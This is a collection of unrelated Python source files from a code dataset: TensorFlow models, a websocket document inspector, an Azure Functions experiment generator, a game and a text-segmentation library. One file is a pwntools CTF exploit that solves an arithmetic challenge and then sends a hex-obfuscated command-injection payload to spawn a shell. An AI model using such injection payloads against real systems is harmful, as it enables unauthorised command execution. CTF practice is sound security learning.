self.loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(self.logits, self.y))
# self.loss = tf.reduce_mean(-tf.reduce_sum(self.y * tf.log(self.logits), reduction_indices=[1]))
self.loss_sum = tf.scalar_summary("loss", self.loss)
# Print trainable variables (useful for debugging)
print("Trainable Variables:", [var.name for var in tf.trainable_variables()])
self.t_vars =tf.trainable_variables()
self.saver = tf.train.Saver()
def train(self, config, X_train, y_train, X_test, y_test):
"""Train DeepPDF"""
train_step = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1).minimize(self.loss)
correct_prediction = tf.equal(tf.argmax(self.logits,1), tf.argmax(self.y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
self.sess.run(tf.initialize_all_variables())
self.writer = tf.train.SummaryWriter("./logs", self.sess.graph)
counter = 1
start_time = time.time()
if self.load(self.checkpoint_dir):
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in range(self.epoch):
all_minibatch_indices = utils.get_random_minibatch_indices(len(X_train), config.batch_size)
num_minibatches = len(all_minibatch_indices)
for minibatch_idx in range(num_minibatches):
minibatch_indices = all_minibatch_indices[minibatch_idx]
batch_x, batch_y = np.zeros([config.batch_size]+[X_train.shape][:-1], dtype='float32'), np.zeros([config.batch_size]+[y_train.shape][:-1], dtype='float32')
batch_x = X_train[minibatch_indices,:,:]
batch_y = y_train[minibatch_indices,:]
# Update model weights
# train_step.run(feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
optimizer = tf.train.GradientDescentOptimizer(0.0002).minimize(self.loss)
# self.sess.run([train_step], feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
self.sess.run([optimizer], feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: config.keep_prob})
batch_loss = self.sess.run(self.loss, feed_dict={self.X:batch_x, self.y:batch_y, self.keep_prob: 1.0})
tf.scalar_summary('batch_loss_cross_entropy', self.loss)
counter += 1
if np.mod(counter, 5) == 1:
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, batch loss: %.8f" \
% (epoch, minibatch_idx, num_minibatches,
time.time() - start_time, batch_loss))
if np.mod(counter, 500) == 2:
self.save(config.checkpoint_dir, counter)
with tf.name_scope('accuracy-metrics'):
# Eval Accuracy after each epoch
test_accuracy = accuracy.eval(feed_dict={self.X: X_test, self.y: y_test, self.keep_prob: 1.0})
print("Epoch %d, testing accuracy %g"%(epoch, test_accuracy))
test_loss = self.loss.eval(feed_dict={self.X: X_test, self.y: y_test, self.keep_prob: 1.0})
print("Epoch %d, test loss %g"%(epoch, test_loss))
training_accuracy = accuracy.eval(feed_dict={self.X: X_train, self.y: y_train, self.keep_prob: 1.0})
print("Epoch %d, training accuracy %g"%(epoch, training_accuracy))
training_loss = self.loss.eval(feed_dict={self.X: X_train, self.y: y_train, self.keep_prob: 1.0})
print("Epoch %d, training loss %g"%(epoch, training_loss))
tf.scalar_summary('test_accuracy', test_accuracy)
tf.scalar_summary('test_loss', batch_loss)
tf.scalar_summary('training_accuracy', batch_loss)
tf.scalar_summary('training_loss', batch_loss)
tf.scalar_summary('accuracy-metrics', accuracy)
merged = tf.merge_all_summaries()
def rnn_simple_model(self, X, y):
"""Returns Model Graph"""
# print(X.get_shape())
with tf.name_scope("recurrent_layers") as scope:
# Create LSTM Cell
cell = tf.nn.rnn_cell.LSTMCell(self.recurrent_layer_width)
cell = tf.nn.rnn_cell.DropoutWrapper(
cell, output_keep_prob=self.keep_prob)
stacked_cells = tf.nn.rnn_cell.MultiRNNCell([cell] * self.n_recurrent_layers)
output, encoding = tf.nn.dynamic_rnn(stacked_cells, X, dtype=tf.float32)
with tf.name_scope("fc_layers") as scope:
# Connect RNN Embedding output into fully connected layers
prev_layer = encoding
for fc_index in range(0, self.n_fc_layers-1):
fci = lrelu(linear(prev_layer, self.fc_layer_width, 'fc{}'.format(fc_index)))
fc_prev = fci
fc_final = linear(fc_prev, self.n_classes, 'fc{}'.format(self.n_fc_layers-1))
return tf.nn.softmax(fc_final)
def save(self, checkpoint_dir, step):
"""Saves Model"""
model_name = "sentiment.model"
model_dir = "sentiment-%s" % (self.batch_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
"""Loads Model"""
print(" [*] Reading checkpoints...")
model_dir = "sentiment-%s" % (self.batch_size)
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
|
StarcoderdataPython
|
11383329
|
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import json
import logging
import threading
import websockets
import send_receive_sync_helper
class DocumentInspector:
# Types of the documents to be inspected.
__GUI_DOC_TYPES = ['biDashboard', 'slide']
# Methods used in the sent messages.
__GET_DOCUMENT = 'GetDocument'
__GET_WIDGET_CONTAINER = 'GetWidgetContainer'
__GET_WIDGET_PROPERTIES = 'GetWidgetProperties'
def __init__(self, server_uri):
self.__server_uri = server_uri
self.__messages_counter = 0
self.__messages_counter_thread_lock = threading.Lock()
def get_widgets(self, doc_id, timeout=60):
"""Gets information from all graphical components that belong to a given document.
This method provides users a synchronized entry point, hiding the asynchronous processing
complexity from them.
Args:
doc_id: The document identifier.
timeout: Max seconds to wait.
Returns:
A ``list`` with the document's graphical components information.
"""
try:
return self.__run_until_complete(self.__get_widgets(doc_id, timeout))
except Exception:
logging.warning("error on get_widgets:", exc_info=True)
return []
@classmethod
def __run_until_complete(cls, future):
event_loop = asyncio.new_event_loop()
try:
return event_loop.run_until_complete(future)
except Exception:
logging.info('Something wrong happened while the workload was running.')
cls.__cancel_all_tasks(event_loop)
raise
finally:
event_loop.close()
async def __get_widgets(self, doc_id, timeout):
async with self.__connect_websocket() as websocket:
sync_helper = send_receive_sync_helper.SendReceiveSyncHelper()
await self.__start_get_widgets_workload(websocket, doc_id, sync_helper)
msg_sender = self.__send_get_widgets_messages
msg_receiver = self.__receive_get_widgets_messages
return await asyncio.wait_for(
self.__hold_websocket_communication(msg_sender(websocket, sync_helper),
msg_receiver(websocket, sync_helper)), timeout)
def __connect_websocket(self):
"""Opens a websocket connection.
Returns:
An awaiting function that yields a :class:`WebSocketClientProtocol` which can then be
used to send and receive messages.
"""
return websockets.connect(uri=self.__server_uri)
async def __start_get_widgets_workload(self, websocket, doc_id, sync_helper):
message_id = await self.__send_get_document_message(websocket, doc_id)
sync_helper.add_pending_reply_id(message_id, self.__GET_DOCUMENT)
@classmethod
async def __hold_websocket_communication(cls, msg_sender, msg_receiver):
"""Holds a websocket communication session until the awaitable message sender and receiver
are done.
Args:
msg_sender: A coroutine or future that sends messages.
msg_receiver: A coroutine or future that receives messages.
Returns:
The result of the receiver.
"""
results = await asyncio.gather(*[msg_sender, msg_receiver])
# The ``results`` list is expected to have two elements. The first one stores the result of
# the message sender and can be ignored. The second one stores the result of the receiver,
# which means the object to be returned on successful execution.
return results[1]
@classmethod
async def __receive_get_widgets_messages(cls, websocket, sync_helper):
results = []
async for message in websocket:
message_json = json.loads(message)
message_id = message_json.get('id')
if not message_id:
logging.info('Unhandled API message: %s', message)
continue
logging.debug('Reply received: %d', message_id)
if sync_helper.is_pending_reply(message_id, cls.__GET_WIDGET_PROPERTIES):
results.append(message_json['result'])
else:
sync_helper.add_unhandled_reply(message_json)
sync_helper.remove_pending_reply_id(message_id)
sync_helper.notify_new_reply()
return results
async def __send_get_widgets_messages(self, websocket, sync_helper):
while not sync_helper.were_all_replies_processed():
if not sync_helper.is_there_reply_notification():
await sync_helper.wait_for_replies()
sync_helper.clear_reply_notifications()
for reply in sync_helper.get_all_unhandled_replies():
await self.__send_follow_up_msg_get_widgets(websocket, sync_helper, reply)
# Closes the websocket when there are no more replies to be processed.
await websocket.close()
async def __send_follow_up_msg_get_widgets(self, websocket, sync_helper, reply):
message_id = reply.get('id')
if sync_helper.is_method(message_id, self.__GET_DOCUMENT):
await self.__handle_get_document_reply(websocket, sync_helper, reply)
sync_helper.remove_unhandled_reply(reply)
elif sync_helper.is_method(message_id, self.__GET_WIDGET_CONTAINER):
await self.__handle_get_widget_container_reply(websocket, sync_helper, reply)
sync_helper.remove_unhandled_reply(reply)
async def __send_get_document_message(self, websocket, doc_id):
"""Sends a Get Document message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_DOCUMENT,
'params': {
'id': doc_id
},
'id': message_id
}))
logging.debug('Get Document message sent: %d', message_id)
return message_id
async def __send_get_widget_container_message(self, websocket, container_id):
"""Sends a Get Widget Container message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_WIDGET_CONTAINER,
'params': {
'id': container_id,
},
'id': message_id,
}))
logging.debug('Get Widget Container message sent: %d', message_id)
return message_id
async def __send_get_widget_properties_message(self, websocket, widget_id):
"""Sends a Get Widget Properties message.
Returns:
The message id.
"""
message_id = self.__generate_message_id()
await websocket.send(
json.dumps({
'method': self.__GET_WIDGET_PROPERTIES,
'params': {
'id': widget_id,
},
'id': message_id,
}))
logging.debug('Get Widget Properties message sent: %d', message_id)
return message_id
async def __handle_get_document_reply(self, websocket, sync_helper, reply):
result = reply['result']
if not result['type'] in self.__GUI_DOC_TYPES:
return
container_ids = result['widgetContainerIds']
get_widget_container_msg_ids = await asyncio.gather(*[
self.__send_get_widget_container_message(websocket, container_id)
for container_id in container_ids
])
sync_helper.add_pending_reply_ids(get_widget_container_msg_ids,
self.__GET_WIDGET_CONTAINER)
async def __handle_get_widget_container_reply(self, websocket, sync_helper, reply):
widget_id = reply['result']['widgetId']
get_widget_properties_msg_id = \
await self.__send_get_widget_properties_message(websocket, widget_id)
sync_helper.add_pending_reply_id(get_widget_properties_msg_id,
self.__GET_WIDGET_PROPERTIES)
@classmethod
def __cancel_all_tasks(cls, event_loop):
logging.info('All tasks will be canceled...')
for task in asyncio.Task.all_tasks(loop=event_loop):
task.cancel()
def __generate_message_id(self):
with self.__messages_counter_thread_lock:
self.__messages_counter += 1
return self.__messages_counter
|
StarcoderdataPython
|
11227242
|
import os
import glob
import pandas as pd
import tarfile
import urllib.request
from experimentgenerator.experiment_generator import ExperimentGenerator
from experimentgenerator.quantiled_cache import QuantiledCache
from autoscalingsim.utils.error_check import ErrorChecker
from autoscalingsim.utils.download_bar import DownloadProgressBar
@ExperimentGenerator.register('azurefunctions')
class AzureFunctionsExperimentGenerator(ExperimentGenerator):
"""
Generates the basic experiment configuration files based on the
Azure functions dataset published at ATC'20:
<NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, <NAME>, & <NAME> (2020).
Serverless in the Wild: Characterizing and Optimizing the Serverless Workload at a Large Cloud Provider.
In 2020 USENIX Annual Technical Conference (USENIX ATC 20) (pp. 205–218). USENIX Association.
"""
dataset_link = 'https://azurecloudpublicdataset2.blob.core.windows.net/azurepublicdatasetv2/azurefunctions_dataset2019/azurefunctions-dataset2019.tar.xz'
filename_pattern_invocations = 'invocations_per_function_md.anon.d{}.csv'
filename_pattern_memory = 'app_memory_percentiles.anon.d{}.csv'
filename_pattern_duration = 'function_durations_percentiles.anon.d{}.csv'
@classmethod
def enrich_experiment_generation_recipe(cls, specialized_generator_config : dict, experiment_generation_recipe : dict):
data_path = ErrorChecker.key_check_and_load('data_path', specialized_generator_config)
download_dataset = True
if os.path.exists(data_path):
download_dataset = len(glob.glob(data_path + '/*.csv')) == 0
else:
os.makedirs(data_path)
if download_dataset:
print('Downloading the Azure functions archive...')
downloaded_data_archive = os.path.join(data_path, 'azurefunctions-dataset2019.tar.xz')
urllib.request.urlretrieve(cls.dataset_link, downloaded_data_archive, DownloadProgressBar())
print('Unpacking...')
with tarfile.open(downloaded_data_archive) as f:
f.extractall(data_path)
print('Removing the archive...')
os.remove(downloaded_data_archive)
quantiled_cache = QuantiledCache.load_or_create(data_path)
file_id_raw = ErrorChecker.key_check_and_load('file_id', specialized_generator_config)
file_id = cls._file_id_to_str(file_id_raw)
# Invocations
filename_invocations = os.path.join(data_path, cls.filename_pattern_invocations.format(file_id))
invocations_data_raw = pd.read_csv(filename_invocations)
invocations_data_http = invocations_data_raw[invocations_data_raw.Trigger == 'http']
invocations_data = pd.melt(invocations_data_http, id_vars = ['HashApp', 'HashFunction'], value_vars = invocations_data_http.columns[4:]).rename(columns = {'variable': 'datetime', 'value': 'invocations'})
invocations_data.datetime = pd.to_datetime(invocations_data.datetime, unit = 'm')
invocations_data.set_index(['HashApp', 'HashFunction', 'datetime'], inplace = True)
# Memory
filename_memory = os.path.join(data_path, cls.filename_pattern_memory.format(file_id))
memory_data = pd.read_csv(filename_memory).set_index(['HashOwner', 'HashApp'])
# Duration
filename_duration = os.path.join(data_path, cls.filename_pattern_duration.format(file_id))
duration_data = pd.read_csv(filename_duration).set_index(['HashOwner', 'HashApp', 'HashFunction'])
# Initializing generation parameters
invocations_quantiles_for_apps_filtering = ErrorChecker.key_check_and_load('consider_applications_with_invocations_quantiles', specialized_generator_config)
left_quantile_invocations = ErrorChecker.key_check_and_load('left_quantile', invocations_quantiles_for_apps_filtering)
right_quantile_invocations = ErrorChecker.key_check_and_load('right_quantile', invocations_quantiles_for_apps_filtering)
app_size_quantile = ErrorChecker.key_check_and_load('app_size_quantile_among_selected_based_on_invocations', specialized_generator_config)
apps_in_diapazone = quantiled_cache.update_and_get(left_quantile_invocations, right_quantile_invocations, invocations_data)
# TODO: below two lines take a lot of time to run -- think about optimizing/caching
invocations_data_selected = invocations_data.loc[list(apps_in_diapazone)]
#averaged_load_per_minute = invocations_data_selected.groupby(['datetime']).mean().round().astype({'invocations': 'int32'})
services_count = experiment_generation_recipe['application_recipe']['services'].get('services_count', None)
if services_count is None:
services_count = int(invocations_data_selected.reset_index().groupby(['HashApp'])['HashFunction'].nunique().quantile(app_size_quantile))
memory_data_aggregated = memory_data.groupby(['HashApp']).mean()
memory_data_selected = memory_data_aggregated.reindex(apps_in_diapazone).dropna()
memory_percentiles = memory_data_selected.mean()[2:] / services_count
# TODO: consider using information about the function? e.g. distribution over the functions
# we have to first select a function with its probabilities distribution...
duration_data_aggregated = duration_data.groupby(['HashApp']).mean()
duration_data_selected = duration_data_aggregated.reindex(apps_in_diapazone).dropna()
duration_percentiles = duration_data_selected.mean()[5:]
duration_percentiles_starts = [0] + list(duration_percentiles[:-1])
duration_percentiles_ends = list(duration_percentiles)
memory_percentiles_starts = [0] + list(memory_percentiles[:-1])
memory_percentiles_ends = list(memory_percentiles)
# Enriching the recipe
# TODO: consider empirical distribution
experiment_generation_recipe['application_recipe']['services']['services_count'] = services_count
experiment_generation_recipe['requests_recipe']['duration'] = { 'percentiles': { 'starts': duration_percentiles_starts, 'ends': duration_percentiles_ends},
'probabilities': [0.01, 0.24, 0.25, 0.25, 0.24, 0.01],
'unit': 'ms'}
# TODO: change according to the format in experiment generator and agree with the possible overwrite by other data analyzer
#experiment_generation_recipe['requests_recipe']['system_requirements']['memory'] = { 'percentiles': { 'starts': memory_percentiles_starts, 'ends': memory_percentiles_ends},
# 'probabilities': [0.01, 0.04, 0.20, 0.25, 0.25, 0.20, 0.04, 0.01],
# 'unit': 'MB'}
if experiment_generation_recipe['load_recipe']['load_kind'] == 'seasonal':
invocations_data_per_app = invocations_data.groupby(['HashApp', 'datetime']).max()
invocations_data_per_hour_per_app = invocations_data_per_app.groupby(['HashApp', pd.Grouper(freq='60T', level='datetime')]).sum().fillna(0).rename(columns = {'invocations': 'Load'})
invocations_data_per_hour = list(invocations_data_per_hour_per_app.groupby('datetime').mean().fillna(0)['Load'].astype(int))[:24]
experiment_generation_recipe['load_recipe']['pattern'] = {'type': 'values', 'params': [
{ 'month': 'all', 'day_of_week': 'all',
'values' : invocations_data_per_hour } ]}
@classmethod
def _file_id_to_str(cls, file_id : int):
return '0' + str(file_id) if file_id < 10 else str(file_id)
|
StarcoderdataPython
|
3336621
|
# Copyright 2017 <NAME>
import tensorflow as tf
from layers import InputLayer
from parameter import Parameter
class INeuralNetwork:
def get_input_layer(self, input_id):
pass
def set_input_layer(self, input_id, input_layer):
pass
def get_output_layer(self):
pass
def get_input_placeholder_layers(self):
pass
def compile(self, output):
pass
def is_compiled(self):
pass
def set_parameters(self, parameters):
pass
def get_parameters(self):
pass
def copy(self, new_name, reuse_parameters=False):
pass
def predict_batch(self, inputs):
pass
def predict(self, inputs):
pass
class NeuralNetwork(INeuralNetwork):
def __init__(self, name, session, input_dims):
self.name = name
self.session = session
self.input_dims = input_dims
self.layers = []
self.connections = []
self.parameters = []
self.input_layers = []
self.input_placeholder_layers = []
for input_id, input_dim in enumerate(input_dims):
input_layer = InputLayer(self.name + "_input_" + str(input_id), input_dim)
self.input_layers.append(input_layer)
self.input_placeholder_layers.append(input_layer)
self.is_training = tf.placeholder(tf.bool, name=(name + "_is_training"))
self.output_layer = None
self.output_dim = None
self.compiled = False
def get_input_layer(self, input_id):
return self.input_layers[input_id]
def set_input_layer(self, input_id, input_layer):
if self.compiled:
raise Exception("Network is already compiled. Changes are not allowed!")
if self.input_dims[input_id] != input_layer.get_size():
raise Exception("Input dimensions do not match!")
self.input_placeholder_layers.remove(self.input_layers[input_id])
self.input_layers[input_id].set_input_layer(input_layer)
def get_output_layer(self):
return self.output_layer
def get_input_placeholder_layers(self):
return self.input_placeholder_layers
def explore_layer_inputs(self, layer):
for input_layer in layer.get_input_layers():
if input_layer.get_id() is None:
self.explore_layer_inputs(input_layer)
layer.set_id(len(self.layers))
self.layers.append(layer)
self.connections.append([l.get_id() for l in layer.get_input_layers()])
def compile(self, output_layer, unconnected_layers=None):
if self.compiled:
raise Exception("Network is already compiled!")
self.output_layer = output_layer
self.output_dim = output_layer.get_size()
self.layers = []
# search network backwards from output to find all connected layers
self.explore_layer_inputs(output_layer)
if unconnected_layers:
for l in unconnected_layers:
self.explore_layer_inputs(l)
for input_layer in self.input_layers:
if input_layer.get_id() is None:
raise Exception("Output is unreachable from input " + input_layer.name + "!\nNetwork: " + str(self))
for layer in self.layers:
layer.compile(self)
self.parameters.extend(layer.get_parameters())
self.compiled = True
def is_compiled(self):
return self.compiled
def set_parameters(self, parameters):
if self.compiled:
raise Exception("Cannot change parameters of compiled network!")
expected_parameter_count = sum([l.get_parameter_count() for l in self.layers])
if len(parameters) != expected_parameter_count:
raise Exception(
"Expected " + str(expected_parameter_count) + " parameters, but got " + str(len(parameters)) + " instead!")
for layer in self.layers:
layer.set_parameters(parameters[0:layer.get_parameter_count()])
parameters = parameters[layer.get_parameter_count():]
def get_parameters(self):
return self.parameters
def copy(self, new_name, reuse_parameters=False):
if not self.compiled:
raise Exception("Cannot make a copy of uncompiled network!")
new_network = NeuralNetwork(new_name, self.session, self.input_dims)
for layer_id, layer in enumerate(self.layers):
is_input = False
for input_id, input_layer in enumerate(self.input_layers):
if layer == input_layer:
is_input = True
new_network.layers.append(new_network.input_layers[input_id])
break
if is_input:
continue
input_layers = [new_network.layers[i] for i in self.connections[layer_id]]
layer_copy = layer.copy(layer.name, input_layers)
new_network.layers.append(layer_copy)
if layer == self.output_layer:
new_network.output_layer = layer_copy
if reuse_parameters:
new_network.set_parameters(self.parameters)
return new_network
def predict_batch(self, inputs):
if not self.compiled:
raise Exception("Network must be compiled first!")
feed_dict = dict(zip([l.get_output() for l in self.input_placeholder_layers], inputs))
feed_dict[self.is_training] = False
return self.session.run(self.output_layer.get_output(), feed_dict=feed_dict)
def predict(self, inputs):
return self.predict_batch([[i] for i in inputs])[0]
def custom_fetch(self, inputs, fetch_layers):
feed_dict = dict(zip([l.get_output() for l in self.input_placeholder_layers], inputs))
feed_dict[self.is_training] = False
return self.session.run(fetch_layers, feed_dict=feed_dict)
def __str__(self):
network_str = ""
for layer in self.layers:
network_str += str([l.get_name() for l in layer.get_input_layers()]) + " --> " + layer.get_name() + "\n"
return network_str
class TargetNeuralNetwork(INeuralNetwork):
def __init__(self, name, source_network, approach_rate):
self.name = name
self.source_network = source_network
self.approach_rate = approach_rate
if not source_network.is_compiled():
raise Exception("Cannot create a target network from uncompiled source network!")
self.exponential_ma = tf.train.ExponentialMovingAverage(decay=approach_rate)
self.approach_parameters_op = self.exponential_ma.apply([par.tf_variable for par in source_network.get_parameters()])
self.target_parameters = [Parameter(self.exponential_ma.average(par.tf_variable), trainable=False) for par in source_network.get_parameters()]
self.target_network = source_network.copy(name)
self.target_network.set_parameters(self.target_parameters)
self.target_network.compile(self.target_network.get_output_layer())
self.session = self.source_network.session
self.input_dims = source_network.input_dims
self.is_training = self.target_network.is_training
def approach_source_parameters(self):
self.session.run(self.approach_parameters_op)
def get_input_layer(self, input_id):
return self.target_network.get_input(input_id)
def set_input_layer(self, input_id, input_layer):
return self.target_network.get_input(input_id)
def get_output_layer(self):
return self.target_network.get_output_layer()
def get_input_placeholder_layers(self):
return self.target_network.get_input_placeholder_layers()
def compile(self, output):
return self.target_network.compile(output)
def is_compiled(self):
return self.target_network.is_compiled()
def set_parameters(self, parameters):
raise Exception("Changing parameters of a target network is not supported!")
def get_parameters(self):
return self.target_parameters
def copy(self, new_name, reuse_parameters=False):
return self.target_network.copy(new_name, reuse_parameters)
def predict_batch(self, inputs):
return self.target_network.predict_batch(inputs)
def predict(self, inputs):
return self.target_network.predict(inputs)
|
StarcoderdataPython
|
294133
|
<gh_stars>0
from pwn import *
# context.log_level = 'debug'
p = process('./main_exe')
p.send('\n') # start game
p.sendline('q') # quit game
p.sendline('TeamH4C') # input name
p.sendline('asdf') # input comment
p.sendline('H4C') # secret mode!!!
p.recv()
for repeat in range(5):
print p.recvuntil('(New Wave!)')
q = p.recv(2048).strip()
for f in ['<[', ']>', '=>> ((???))', '!']:
q = q.replace(f, '').strip()
print('question:', q)
num = []
oper = []
for idx, this in enumerate(q.split(' ')):
if idx%2 != 0: # operater
oper.append(this)
else: # num
num.append(int(this))
print(num, oper)
ans = num[0]
for i in range(4):
if oper[i] in ('-', '/'):
ans += num[i+1]
elif oper[i] in ('+', '%'):
ans -= num[i+1]
else:
ans *= num[i+1]
print('answer:', ans)
p.sendline(str(ans))
print [p.recvline()]
log.success(str(repeat+1))
p.sendline(";$'\\x73\\x68'") # command injection
p.interactive()
|
StarcoderdataPython
|
8016583
|
# Rock-paper-scissors-lizard-Spock template
import random
# The key idea of this program is to equate the strings
# "rock", "paper", "scissors", "lizard", "Spock" to numbers
# as follows:
#
# 0 - rock
# 1 - Spock
# 2 - paper
# 3 - lizard
# 4 - scissors
# helper functions
def name_to_number(name):
# delete the following pass statement and fill in your code below
if(name == "Spock" or name=="spock" or name=="SPOCK"):
return 1
elif(name == "Rock" or name =="rock" or name=="ROCK"):
return 0
elif(name == "Paper" or name=="paper" or name=="PAPER"):
return 2
elif(name == "Lizard" or name=="lizard" or name == "LIZARD"):
return 3
elif(name=="Scissors" or name=="scissors" or name=="SCISSORS"):
return 4
else:
##-1 means invalid number
return -1
# convert name to number using if/elif/else
# don't forget to return the result!
def number_to_name(number):
# delete the following pass statement and fill in your code below
if(number == 0):
return "Rock"
elif(number == 1):
return "Spock"
elif(number == 2):
return "Paper"
elif(number == 3):
return "Lizard"
elif(number==4):
return "Scissors"
else:
return "Invalid number"
# convert number to a name using if/elif/else
# don't forget to return the result!
def rpsls(player_choice):
# delete the following pass statement and fill in your code below
# print a blank line to separate consecutive games
print ""
# print out the message for the player's choice
print "Player chooses: " + player_choice
# convert the player's choice to player_number using the function name_to_number()
player_number = name_to_number(player_choice)
#print player_number
# compute random guess for comp_number using random.randrange()
comp_number = random.randrange(0,5)
# convert comp_number to comp_choice using the function number_to_name()
comp_choice = number_to_name(comp_number)
# print out the message for computer's choice
print "Computer chooses: " + comp_choice
# compute difference of comp_number and player_number modulo five
difference = (comp_number - player_number) %5
#print difference
# use if/elif/else to determine winner, print winner message
if(difference == 1 or difference == 2):
print "Computer wins!"
elif(difference == 3 or difference ==4):
print "Player wins!"
else:
print "Tie game!"
# test your code - THESE CALLS MUST BE PRESENT IN YOUR SUBMITTED CODE
rpsls("rock")
rpsls("Spock")
rpsls("paper")
rpsls("lizard")
rpsls("scissors")
# always remember to check your completed program against the grading rubric
|
StarcoderdataPython
|
12846007
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Budou, an automatic CJK line break organizer."""
from __future__ import print_function
from .cachefactory import load_cache
import collections
from xml.etree import ElementTree as ET
import html5lib
import re
import six
import unicodedata
cache = load_cache()
class Chunk(object):
"""Chunk object. This represents a unit for word segmentation.
Attributes:
word: Surface word of the chunk. (str)
pos: Part of speech. (str)
label: Label information. (str)
dependency: Dependency to neighbor words. None for no dependency, True for
dependency to the following word, and False for the dependency to the
previous word. (bool or None)
"""
SPACE_POS = 'SPACE'
BREAK_POS = 'BREAK'
DEPENDENT_LABEL = (
'P', 'SNUM', 'PRT', 'AUX', 'SUFF', 'AUXPASS', 'RDROP', 'NUMBER', 'NUM',
'PREF')
def __init__(self, word, pos=None, label=None, dependency=None):
self.word = word
self.pos = pos
self.label = label
self.dependency = dependency
self._add_dependency_if_punct()
def __repr__(self):
return 'Chunk(%s, %s, %s, %s)' % (
repr(self.word), self.pos, self.label, self.dependency)
@classmethod
def space(cls):
"""Creates space Chunk."""
chunk = cls(u' ', cls.SPACE_POS)
return chunk
@classmethod
def breakline(cls):
"""Creates breakline Chunk."""
chunk = cls(u'\n', cls.BREAK_POS)
return chunk
def is_space(self):
"""Checks if this is space Chunk."""
return self.pos == self.SPACE_POS
def has_cjk(self):
"""Checks if the word of the chunk contains CJK characters
Using range from
https://github.com/nltk/nltk/blob/develop/nltk/tokenize/util.py#L149
"""
for char in self.word:
if any([start <= ord(char) <= end for start, end in
[(4352, 4607), (11904, 42191), (43072, 43135), (44032, 55215),
(63744, 64255), (65072, 65103), (65381, 65500),
(131072, 196607)]
]):
return True
return False
def update_word(self, word):
"""Updates the word of the chunk."""
self.word = word
def serialize(self):
"""Returns serialized chunk data in dictionary."""
return {
'word': self.word,
'pos': self.pos,
'label': self.label,
'dependency': self.dependency,
'has_cjk': self.has_cjk(),
}
def maybe_add_dependency(self, default_dependency_direction):
"""Adds dependency if any dependency is not assigned yet."""
if self.dependency is None and self.label in self.DEPENDENT_LABEL:
self.dependency = default_dependency_direction
def _add_dependency_if_punct(self):
"""Adds dependency if the chunk is punctuation."""
if self.pos == 'PUNCT':
try:
# Getting unicode category to determine the direction.
# Concatenates to the following if it belongs to Ps or Pi category.
# Ps: Punctuation, open (e.g. opening bracket characters)
# Pi: Punctuation, initial quote (e.g. opening quotation mark)
# Otherwise, concatenates to the previous word.
# See also https://en.wikipedia.org/wiki/Unicode_character_property
category = unicodedata.category(self.word)
self.dependency = category in ('Ps', 'Pi')
except:
pass
class ChunkList(list):
"""Chunk list. """
def get_overlaps(self, offset, length):
"""Returns chunks overlapped with the given range.
Args:
offset: Begin offset of the range. (int)
length: Length of the range. (int)
Returns:
Overlapped chunks. (list of Chunk)
"""
# In case entity's offset points to a space just before the entity.
if ''.join([chunk.word for chunk in self])[offset] == ' ':
offset += 1
index = 0
result = []
for chunk in self:
if offset < index + len(chunk.word) and index < offset + length:
result.append(chunk)
index += len(chunk.word)
return result
def swap(self, old_chunks, new_chunk):
"""Swaps old consecutive chunks with new chunk.
Args:
old_chunks: List of consecutive Chunks to be removed. (list of Chunk)
new_chunk: A Chunk to be inserted. (Chunk)
"""
indexes = [self.index(chunk) for chunk in old_chunks]
del self[indexes[0]:indexes[-1] + 1]
self.insert(indexes[0], new_chunk)
class Budou(object):
"""A parser for CJK line break organizer.
Attributes:
service: A Resource object with methods for interacting with the service.
(googleapiclient.discovery.Resource)
"""
DEFAULT_CLASS_NAME = 'ww'
def __init__(self, service):
self.service = service
@classmethod
def authenticate(cls, json_path=None):
"""Authenticates for Cloud Natural Language API and returns a parser.
If a service account private key file is not given, it tries to authenticate
with default credentials.
Args:
json_path: A file path to a service account's JSON private keyfile.
(str, optional)
Returns:
Budou parser. (Budou)
"""
import google_auth_httplib2
from googleapiclient import discovery
scope = ['https://www.googleapis.com/auth/cloud-platform']
if json_path:
try:
from google.oauth2 import service_account
credentials = service_account.Credentials.from_service_account_file(
json_path)
scoped_credentials = credentials.with_scopes(scope)
except ImportError:
print('''Failed to load google.oauth2.service_account module.
If you are running this script in Google App Engine environment,
please call `authenticate` method with empty argument to
authenticate with default credentials.''')
else:
import google.auth
scoped_credentials, project = google.auth.default(scope)
authed_http = google_auth_httplib2.AuthorizedHttp(scoped_credentials)
service = discovery.build('language', 'v1beta2', http=authed_http)
return cls(service)
def parse(self, source, attributes=None, use_cache=True, language=None,
